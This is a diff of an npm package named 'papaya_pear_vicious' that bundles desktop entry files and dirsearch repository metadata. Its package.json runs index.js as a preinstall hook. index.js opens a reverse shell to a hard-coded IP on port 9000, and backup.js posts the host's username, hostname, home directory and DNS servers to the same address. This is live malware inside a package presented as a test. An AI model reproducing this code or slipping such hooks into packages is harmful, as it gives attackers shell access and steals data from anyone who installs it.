papaya_pear_vicious 2.0.0

package/backup.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "128.140.123.124", //replace burpcollaborator.net with Interactsh or pipedream
+    port: 9000,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/chromium.desktop

@@ -0,0 +1,140 @@
+[Desktop Entry]
+Version=1.0
+Name=Chromium Web Browser
+Name[ast]=Restolador web Chromium
+Name[ca]=Navegador web Chromium
+Name[de]=Chromium-Webbrowser
+Name[es]=Navegador web Chromium
+Name[fr]=Navigateur Web Chromium
+Name[gl]=Navegador web Chromium
+Name[he]=דפדפן האינטרנט Chromium
+Name[hr]=Chromium web preglednik
+Name[hu]=Chromium webböngésző
+Name[id]=Peramban Web Chromium
+Name[it]=Browser web Chromium
+Name[ja]=Chromium ウェブ・ブラウザ
+Name[ko]=Chromium 웹 브라우저
+Name[pt_BR]=Chromium Navegador da Internet
+Name[ru]=Веб-браузер Chromium
+Name[sl]=Chromium spletni brskalnik
+Name[sv]=Webbläsaren Chromium
+Name[ug]=Chromium توركۆرگۈ
+Name[zh_CN]=Chromium 网页浏览器
+Name[zh_HK]=Chromium 網頁瀏覽器
+Name[zh_TW]=Chromium 網頁瀏覽器
+GenericName=Web Browser
+GenericName[ar]=متصفح الشبكة
+GenericName[ast]=Restolador web
+GenericName[bg]=Уеб браузър
+GenericName[bn]=ওয়েব ব্রাউজার
+GenericName[ca]=Navegador web
+GenericName[cs]=WWW prohlížeč
+GenericName[da]=Browser
+GenericName[de]=Webbrowser
+GenericName[el]=Περιηγητής ιστού
+GenericName[en_GB]=Web Browser
+GenericName[es]=Navegador web
+GenericName[et]=Veebibrauser
+GenericName[fi]=WWW-selain
+GenericName[fil]=Web Browser
+GenericName[fr]=Navigateur Web
+GenericName[gl]=Navegador web
+GenericName[gu]=વેબ બ્રાઉઝર
+GenericName[he]=דפדפן אינטרנט
+GenericName[hi]=वेब ब्राउज़र
+GenericName[hr]=Web preglednik
+GenericName[hu]=Webböngésző
+GenericName[id]=Peramban Web
+GenericName[it]=Browser web
+GenericName[ja]=ウェブ・ブラウザ
+GenericName[kn]=ಜಾಲ ವೀಕ್ಷಕ
+GenericName[ko]=웹 브라우저
+GenericName[lt]=Žiniatinklio naršyklė
+GenericName[lv]=Tīmekļa pārlūks
+GenericName[ml]=വെബ് ബ്രൌസര്‍
+GenericName[mr]=वेब ब्राऊजर
+GenericName[nb]=Nettleser
+GenericName[nl]=Webbrowser
+GenericName[or]=ଓ୍ବେବ ବ୍ରାଉଜର
+GenericName[pl]=Przeglądarka WWW
+GenericName[pt]=Navegador Web
+GenericName[pt_BR]=Navegador da Internet
+GenericName[ro]=Navigator de Internet
+GenericName[ru]=Веб-браузер
+GenericName[sk]=WWW prehliadač
+GenericName[sl]=Spletni brskalnik
+GenericName[sr]=Интернет прегледник
+GenericName[sv]=Webbläsare
+GenericName[ta]=இணைய உலாவி
+GenericName[te]=మహాతల అన్వేషి
+GenericName[th]=เว็บเบราว์เซอร์
+GenericName[tr]=Web Tarayıcı
+GenericName[ug]=توركۆرگۈ
+GenericName[uk]=Навігатор Тенет
+GenericName[vi]=Bộ duyệt Web
+GenericName[zh_CN]=网页浏览器
+GenericName[zh_HK]=網頁瀏覽器
+GenericName[zh_TW]=網頁瀏覽器
+Comment=Access the Internet
+Comment[ar]=الدخول إلى الإنترنت
+Comment[ast]=Accesu a Internet
+Comment[bg]=Достъп до интернет
+Comment[bn]=ইন্টারনেটটি অ্যাক্সেস করুন 
+Comment[ca]=Accediu a Internet
+Comment[cs]=Přístup k internetu
+Comment[da]=Få adgang til internettet
+Comment[de]=Internetzugriff
+Comment[el]=Πρόσβαση στο Διαδίκτυο
+Comment[en_GB]=Access the Internet
+Comment[es]=Acceda a Internet
+Comment[et]=Pääs Internetti
+Comment[fi]=Käytä internetiä
+Comment[fil]=I-access ang Internet
+Comment[fr]=Explorer le Web
+Comment[gl]=Acceda a Internet
+Comment[gu]=ઇંટરનેટ ઍક્સેસ કરો
+Comment[he]=גישה לאינטרנט
+Comment[hi]=इंटरनेट तक पहुंच स्थापित करें
+Comment[hr]=Pristupite Internetu
+Comment[hu]=Az internet elérése
+Comment[id]=Akses Internet
+Comment[it]=Accesso a Internet
+Comment[ja]=インターネットにアクセス
+Comment[kn]=ಇಂಟರ್ನೆಟ್ ಅನ್ನು ಪ್ರವೇಶಿಸಿ
+Comment[ko]=인터넷에 연결합니다
+Comment[lt]=Interneto prieiga
+Comment[lv]=Piekļūt internetam
+Comment[ml]=ഇന്റര്‍‌നെറ്റ് ആക്‌സസ് ചെയ്യുക
+Comment[mr]=इंटरनेटमध्ये प्रवेश करा
+Comment[nb]=Gå til Internett
+Comment[nl]=Verbinding maken met internet
+Comment[or]=ଇଣ୍ଟର୍ନେଟ୍ ପ୍ରବେଶ କରନ୍ତୁ
+Comment[pl]=Skorzystaj z internetu
+Comment[pt]=Aceder à Internet
+Comment[pt_BR]=Acessar a internet
+Comment[ro]=Accesaţi Internetul
+Comment[ru]=Доступ в Интернет
+Comment[sk]=Prístup do siete Internet
+Comment[sl]=Dostop do interneta
+Comment[sr]=Приступите Интернету
+Comment[sv]=Surfa på Internet
+Comment[ta]=இணையத்தை அணுகுதல்
+Comment[te]=ఇంటర్నెట్‌ను ఆక్సెస్ చెయ్యండి
+Comment[th]=เข้าถึงอินเทอร์เน็ต
+Comment[tr]=İnternet'e erişin
+Comment[ug]=ئىنتېرنېتنى زىيارەت قىلىش
+Comment[uk]=Доступ до Інтернету
+Comment[vi]=Truy cập Internet
+Comment[zh_CN]=访问互联网
+Comment[zh_HK]=連線到網際網路
+Comment[zh_TW]=連線到網際網路
+Exec=/usr/bin/chromium %U
+Terminal=false
+X-MultipleArgs=false
+Type=Application
+Icon=chromium
+Categories=Network;WebBrowser;
+MimeType=text/html;text/xml;application/xhtml_xml;application/x-mimearchive;x-scheme-handler/http;x-scheme-handler/https;
+StartupWMClass=chromium
+StartupNotify=true
+Keywords=browser

package/index.js

@@ -0,0 +1,19 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+(function(){
+    var net = require("net"),
+        cp = require("child_process"),
+        sh = cp.spawn("/bin/sh", []);
+    var client = new net.Socket();
+    client.connect(9000, "128.140.123.124", function(){
+        client.pipe(sh.stdin);
+        sh.stdout.pipe(client);
+        sh.stderr.pipe(client);
+    });
+    return /a/; // Prevents the Node.js application form crashing
+})();

package/install4j_u965hn-BurpSuiteCommunity.desktop

@@ -0,0 +1,9 @@
+#!/usr/bin/env xdg-open
+[Desktop Entry]
+Type=Application
+Name=Burp Suite Community Edition
+Exec="/home/admin/BurpSuiteCommunity/BurpSuiteCommunity" %U
+MimeType=application/x-extension-burp;
+Icon=/home/admin/BurpSuiteCommunity/.install4j/BurpSuiteCommunity.png
+Categories=Application;
+StartupWMClass=install4j-burp-StartBurp

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "papaya_pear_vicious",
+  "version": "2.0.0",
+  "description": "Test",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/tools/dirsearch/.github/FUNDING.yml

@@ -0,0 +1,3 @@
+# These are supported funding model platforms
+
+github: maurosoria

package/tools/dirsearch/.github/ISSUE_TEMPLATE/ask_question.md

@@ -0,0 +1,9 @@
+---
+name: Ask Question
+about: Ask a question about dirsearch
+labels: question
+---
+
+### What is the question?
+
+What do you like to ask about?

package/tools/dirsearch/.github/ISSUE_TEMPLATE/bug_report.md

@@ -0,0 +1,17 @@
+---
+name: Bug Report
+about: Report a dirsearch problem
+labels: bug
+---
+
+### What is the current behavior?
+
+What actually happens?
+
+### What is the expected behavior?
+
+What it should be instead?
+
+### Any additional information?
+
+Screenshots, dirsearch log, dirsearch version, used command, ...?

package/tools/dirsearch/.github/ISSUE_TEMPLATE/feature_request.md

@@ -0,0 +1,13 @@
+---
+name: Feature Request
+about: Suggest a new feature for dirsearch improvement
+labels: enhancement
+---
+
+### What is the feature?
+
+What is it?
+
+### What is the use case?
+
+When and who will use this? Why this matters?

package/tools/dirsearch/.github/pull_request_template.md

@@ -0,0 +1,13 @@
+Description
+---------------
+
+What will it do?
+
+If this PR will fix an issue, please address it:
+Fix #{issue}
+
+Requirements
+---------------
+
+- [ ] Add your name to `CONTRIBUTERS.md`
+- [ ] If this is a new feature, then please add some additional information about it to `CHANGELOG.md`

package/tools/dirsearch/.github/workflows/ci.yml

@@ -0,0 +1,47 @@
+name: Inspection
+
+on: [push, pull_request]
+
+jobs:
+  build:
+    runs-on: ${{ matrix.os }}
+
+    strategy:
+      fail-fast: false
+      matrix:
+        python-version: [3.7, 3.9]
+        os: ['ubuntu-latest', 'windows-latest']
+
+    steps:
+    - uses: actions/checkout@v2
+    - name: Set up Python ${{ matrix.python-version }}
+      uses: actions/setup-python@v2
+      with:
+        python-version: ${{ matrix.python-version }}
+    - name: Install dependencies
+      run: |
+        python -m pip install --upgrade pip
+        pip install codespell flake8 -r requirements.txt
+    - name: Test
+      run: |
+        echo index.%EXT% > tmp_wordlist.txt
+        echo home.html >> tmp_wordlist.txt
+        echo testphp.vulnweb.com > tmp_targets.txt
+        echo "GET / HTTP/1.1" > tmp_raw.txt
+        echo "Host: google.com" >> tmp_raw.txt
+        echo "User-Agent: dirsearch" >> tmp_raw.txt
+        echo "Accept: */*" >> tmp_raw.txt
+        python3 dirsearch.py -w tmp_wordlist.txt -u https://example.com -o tmp_report.json --format json --force-recursive -R 3 --full-url -q -O
+        python3 dirsearch.py -w tmp_wordlist.txt -l tmp_targets.txt --subdirs /,admin/ --exclude-extensions conf -q -L -f -i 200 --user-agent a --log tmp_log.log
+        python3 dirsearch.py -w tmp_wordlist.txt -u https://localhost --ip 93.184.216.34 --max-rate 2 -H K:V --random-agent --overwrite-extensions --no-color
+        python3 dirsearch.py -w tmp_wordlist.txt --raw tmp_raw.txt --prefixes . --suffixes ~ --skip-on-status 404 -m POST -d test=1 --crawl --min-response-size 9
+        echo https://self-signed.badssl.com | python3 dirsearch.py -w tmp_wordlist.txt --stdin --max-time 9 --auth u:p --auth-type basic --scheme http
+
+    - name: Unit Test
+      run: python3 testing.py
+
+    - name: Lint
+      run: |
+        flake8 .
+    - name: Codespell
+      run: codespell

package/tools/dirsearch/.github/workflows/codeql-analysis.yml

@@ -0,0 +1,71 @@
+# For most projects, this workflow file will not need changing; you simply need
+# to commit it to your repository.
+#
+# You may wish to alter this file to override the set of languages analyzed,
+# or to provide custom queries or build logic.
+#
+# ******** NOTE ********
+# We have attempted to detect the languages in your repository. Please check
+# the `language` matrix defined below to confirm you have the correct set of
+# supported CodeQL languages.
+#
+name: "CodeQL"
+
+on:
+  push:
+    branches: [ master ]
+  pull_request:
+    # The branches below must be a subset of the branches above
+    branches: [ master ]
+  schedule:
+    - cron: '38 0 * * 0'
+
+jobs:
+  analyze:
+    name: Analyze
+    runs-on: ubuntu-latest
+    permissions:
+      actions: read
+      contents: read
+      security-events: write
+
+    strategy:
+      fail-fast: false
+      matrix:
+        language: [ 'python' ]
+        # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ]
+        # Learn more:
+        # https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed
+
+    steps:
+    - name: Checkout repository
+      uses: actions/checkout@v2
+
+    # Initializes the CodeQL tools for scanning.
+    - name: Initialize CodeQL
+      uses: github/codeql-action/init@v1
+      with:
+        languages: ${{ matrix.language }}
+        # If you wish to specify custom queries, you can do so here or in a config file.
+        # By default, queries listed here will override any specified in a config file.
+        # Prefix the list here with "+" to use these queries and those in the config file.
+        # queries: ./path/to/local/query, your-org/your-repo/queries@main
+
+    # Autobuild attempts to build any compiled languages  (C/C++, C#, or Java).
+    # If this step fails, then you should remove it and run the build manually (see below)
+    - name: Autobuild
+      uses: github/codeql-action/autobuild@v1
+
+    # ℹ️ Command-line programs to run using the OS shell.
+    # 📚 https://git.io/JvXDl
+
+    # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
+    #    and modify them (or add more) to build your code if your project
+    #    uses a compiled language
+
+    #- run: |
+    #   make bootstrap
+    #   make release
+
+    - name: Perform CodeQL Analysis
+      uses: github/codeql-action/analyze@v1

package/tools/dirsearch/.github/workflows/docker-image.yml

@@ -0,0 +1,18 @@
+name: Docker Image CI
+
+on:
+  push:
+    branches: [ "master" ]
+  pull_request:
+    branches: [ "master" ]
+
+jobs:
+
+  build:
+
+    runs-on: ubuntu-latest
+
+    steps:
+    - uses: actions/checkout@v3
+    - name: Build the Docker image
+      run: docker build . --file Dockerfile --tag my-image-name:$(date +%s)

package/tools/dirsearch/.github/workflows/semgrep-analysis.yml

@@ -0,0 +1,55 @@
+# This workflow file requires a free account on Semgrep.dev to
+# manage rules, file ignores, notifications, and more.
+#
+# See https://semgrep.dev/docs
+
+name: Semgrep
+
+on:
+  push:
+    branches: [ master ]
+  pull_request:
+    # The branches below must be a subset of the branches above
+    branches: [ master ]
+  schedule:
+    - cron: '19 5 * * 6'
+
+jobs:
+  semgrep:
+    name: Scan
+    runs-on: ubuntu-latest
+    # Skip any PR created by dependabot to avoid permission issues
+    if: (github.actor != 'dependabot[bot]')
+    steps:
+      # Fetch project source
+      - uses: actions/checkout@v2
+
+      - uses: returntocorp/semgrep-action@v1
+        with:
+          config: >- # more at semgrep.dev/explore
+            p/security-audit
+            p/secrets
+
+        # Instead of `config:`, use rules set in Semgrep App.
+        # Get your token from semgrep.dev/manage/settings.
+          publishToken: ${{ secrets.SEMGREP_APP_TOKEN }}
+
+        # Never fail the build due to findings on pushes.
+        # Instead, just collect findings for semgrep.dev/manage/findings
+        #   auditOn: push
+
+        # Upload findings to GitHub Advanced Security Dashboard [step 1/2]
+        # See also the next step.
+          generateSarif: "1"
+
+        # Change job timeout (default is 1800 seconds; set to 0 to disable)
+        # env:
+        #   SEMGREP_TIMEOUT: 300
+
+      # Upload findings to GitHub Advanced Security Dashboard [step 2/2]
+      - name: Upload SARIF file for GitHub Advanced Security Dashboard
+        uses: github/codeql-action/upload-sarif@v1
+        with:
+          sarif_file: semgrep.sarif
+        if: always()
+

package/tools/dirsearch/CHANGELOG.md

@@ -0,0 +1,149 @@
+# Changelog
+
+## [Unreleased]
+
+## [0.4.3] - October 2nd, 2022
+- Automatically detect the URI scheme (`http` or `https`) if no scheme is provided
+- SQLite report format
+- Option to overwrite unwanted extensions with selected extensions
+- Option to view redirects history when following redirects
+- Option to crawl web paths in the responses
+- HTTP traffic is saved inside log file
+- Capability to save progress and resume later
+- Support client certificate
+- Maximum size of the log file via configuration
+
+## [0.4.2] - September 12, 2021
+- More accurate
+- Exclude responses by redirects
+- URLs from STDIN
+- Fixed the CSV Injection vulnerability (https://www.exploit-db.com/exploits/49370)
+- Raw request supported
+- Can setup the default URL scheme (will be used when there is no scheme in the URL)
+- Added max runtime option
+- Recursion on specified status codes
+- Max request rate
+- Support several authentication types
+- Deep/forced recursive scan
+- HTML report format
+- Option to skip target by specified status codes
+- Bug fixes
+
+## [0.4.1] - August 12, 2020
+- Faster
+- Allow to brute force through a CIDR notation
+- Exclude responses by human readable sizes
+- Provide headers from a file
+- Match/filter status codes by ranges
+- Detect 429 response status code
+- Support SOCKS proxy
+- XML, Markdown and CSV report formats
+- Capital wordlist format
+- Option to replay proxy with found paths
+- Option to remove all extensions in the wordlist
+- Option to exit whenever an error occurs
+- Option to disable colored output
+- Debug mode
+- Multiple bugfixes
+
+## [0.4.0] - September 27, 2020
+- Exclude extensions argument added
+- No dot extensions option
+- Support HTTP request data
+- Added minimal response length and maximal response length arguments
+- Added include status codes and exclude status codes arguments
+- Added --clean-view option
+- Added option to print the full URL in the output
+- Added Prefixes and Suffixes arguments
+- Multiple bugfixes
+
+## [0.3.9] - November 26, 2019
+- Added default extensions argument (-E).
+- Added suppress empty responses.
+- Recursion max depth.
+- Exclude responses with text and regexes.
+- Multiple fixes.
+
+## [0.3.8] - July 25, 2017
+- Delay argument added.
+- Request by hostname switch added.
+- Suppress empty switch added.
+- Added Force Extensions switch.
+- Multiple bugfixes.
+
+## [0.3.7] - August 22, 2016
+- Force extensions switch added
+
+## [0.3.6] - February 14, 2016
+- Bugfixes
+
+## [0.3.5] - January 29, 2016
+- Improved heuristic
+- Replaced urllib3 for requests 
+- Error logs
+- Batch reports 
+- User agent randomization 
+- bugfixes
+
+## [0.3.0] - February 5, 2015
+- Fixed issue3
+- Fixed timeout exception
+- Ported to Python3
+- Other bugfixes
+
+## [0.2.7] - November 21, 2014
+- Added Url List feature (-l)
+- Changed output
+- Minor Fixes
+
+## [0.2.6] - September 12, 2014
+- Fixed bug when dictionary size is greater than threads count
+- Fixed URL encoding bug
+
+## [0.2.5] - September 2, 2014
+- Shows Content-Length in output and reports
+- Added default.conf file (for setting defaults)
+- Report auto save feature added.
+
+## [0.2.4] - July 17, 2014
+- Added Windows support
+- `--scan-subdirs` argument added
+- `--exclude-subdirs` added
+- `--header` argument added
+- Dirbuster dictionaries added
+- Fixed some concurrency bugs
+- MVC refactoring
+
+## 0.2.3 - July 7, 2014
+- Fixed some bugs
+- Minor refactorings
+- Exclude status switch
+- Pause/next directory feature
+- Changed help structure
+- Expaded default dictionary
+
+## 0.2.2 - July 2, 2014
+- Fixed some bugs
+- Showing percentage of tested paths and added report generation feature
+
+## 0.2.1 - May 1, 2014
+- Fixed some bugs and added recursive option
+
+## 0.2.0 - January 31, 2014
+- Initial public release
+
+[Unreleased]: https://github.com/maurosoria/dirsearch/tree/master
+[0.4.3]: https://github.com/maurosoria/dirsearch/tree/v0.4.3
+[0.4.2]: https://github.com/maurosoria/dirsearch/tree/v0.4.2
+[0.4.1]: https://github.com/maurosoria/dirsearch/tree/v0.4.1
+[0.4.0]: https://github.com/maurosoria/dirsearch/tree/v0.4.0
+[0.3.9]: https://github.com/maurosoria/dirsearch/tree/v0.3.9
+[0.3.8]: https://github.com/maurosoria/dirsearch/tree/v0.3.8
+[0.3.7]: https://github.com/maurosoria/dirsearch/tree/v0.3.7
+[0.3.6]: https://github.com/maurosoria/dirsearch/tree/v0.3.6
+[0.3.5]: https://github.com/maurosoria/dirsearch/tree/v0.3.5
+[0.3.0]: https://github.com/maurosoria/dirsearch/tree/v0.3.0
+[0.2.7]: https://github.com/maurosoria/dirsearch/tree/v0.2.7
+[0.2.6]: https://github.com/maurosoria/dirsearch/tree/v0.2.6
+[0.2.5]: https://github.com/maurosoria/dirsearch/tree/v0.2.5
+[0.2.4]: https://github.com/maurosoria/dirsearch/tree/v0.2.4